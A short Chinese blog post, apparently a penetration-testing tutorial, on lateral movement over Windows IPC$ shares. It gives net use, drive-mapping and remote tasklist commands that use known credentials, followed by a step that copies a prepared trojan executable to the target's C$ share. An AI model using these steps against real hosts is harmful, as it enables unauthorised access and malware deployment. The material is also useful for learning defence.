利用IPC进行横向渗透

  1. IPC利用条件
  2. 利用过程

IPC利用条件

服务器开启了139或者445端口,可以利用IPC$连接,获取目标主机上的目录结构、用户信息等等。

利用过程

首先我们看当前IPC连接记录,这里的记录是空的,说明占时没有链接

现在我们建立一个完整的连接

1
net use \\127.0.0.1\ipc$ "password" /user:"username"


这个时候我们再net view,发现成功建立连接

然后可以将目标机器的磁盘映射出来,这里我把目标机器的C盘映射到了本机的F盘

1
net use F: \\127.0.0.1\c$ "密码" /user:"用户名"


查看下目标机器的进程

1
tasklist /s 192.168.43.100 /u username /p password

利用copy命令将我们构造好的木马程序复制到目标机器上面

1
2
3
copy ccc.exe \\192.168.43.100\C$

dir \\192.168.43.100\C&

然后怎么玩就看思路了

这个ipc的利用前提也是要有目标服务器的账号密码或者账号为空的情况下才能进去,有了账号密码可以直接3389了吧,哈哈哈


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:利用IPC进行横向渗透

本文作者:sher10ck

发布时间:2020-02-01, 19:07:34

最后更新:2020-02-01, 21:23:06

原始链接:http://sherlocz.github.io/2020/02/01/利用IPC进行横向渗透/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录